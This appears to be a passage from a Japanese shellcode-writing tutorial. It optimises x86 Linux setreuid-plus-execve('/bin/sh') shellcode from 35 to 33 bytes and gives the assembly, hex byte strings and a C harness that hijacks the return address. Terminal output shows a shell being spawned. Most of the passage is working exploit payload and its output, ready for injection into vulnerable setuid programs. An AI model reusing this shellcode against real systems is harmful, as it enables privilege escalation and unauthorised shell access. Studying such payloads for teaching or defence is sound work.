○システムコール番号のPUSHによる生成 ----- .global main main: #setreuid xorl %ebx, %ebx xorl %ecx, %ecx pushl $0x46 pop %eax int $0x80 #execve xorl %eax, %eax pushl %eax pushl $0x68732f2f pushl $0x6e69622f movl %esp, %ebx pushl %eax pushl %ebx movl %esp, %ecx xorl %edx, %edx movb $0xb, %al int $0x80 ----- defolos@glazheim:~/Desktop$ gcc tiny-sh1.s -Wall defolos@glazheim:~/Desktop$ objdump -d a.out|grep \ -A 30 > test.txt defolos@glazheim:~/Desktop$ ./codec.exe test.txt [extracted code] 31 db 31 c9 6a 46 58 cd 80 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 31 d2 b0 0b cd 80 90 90 90 90 90 90 90 90 90 90 55 89 e5 4@_4@ [converted code] \x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x89\xe5\x4@_4 ----- unsigned char payload[]="\x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; int main(void){ int *retadd; retadd = (int *)&retadd + 2; (*retadd) = (int)payload; return 0; } ----- defolos@glazheim:~$ gcc test.c defolos@glazheim:~$ ./a.out sh-2.05b$ 35バイトから34バイトに縮小され、正常にシェルが起動する事が確認できた。 ○CDP命令の活用 ----- .global main main: #setreuid xorl %ebx, %ebx xorl %ecx, %ecx pushl $0x46 pop %eax int $0x80 #execve xorl %eax, %eax pushl %eax pushl $0x68732f2f pushl $0x6e69622f movl %esp, %ebx pushl %eax pushl %ebx movl %esp, %ecx cltd movb $0xb, %al int $0x80 ----- defolos@glazheim:~/Desktop$ ./codec.exe test.txt [extracted code] 31 db 31 c9 6a 46 58 cd 80 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 53 89 e1 99 b0 0b cd 80 90 90 90 90 90 90 90 90 90 90 90 55 [converted code] \x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x ----- unsigned char payload[]="\x31\xdb\x31\xc9\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; int main(void){ int *retadd; retadd = (int *)&retadd + 2; (*retadd) = (int)payload; return 0; } ----- defolos@glazheim:~$ gcc -Wall test.c defolos@glazheim:~$ ./a.out sh-2.05b$ 34バイトが33バイトに短縮され、正常に動作する個とが確認できた。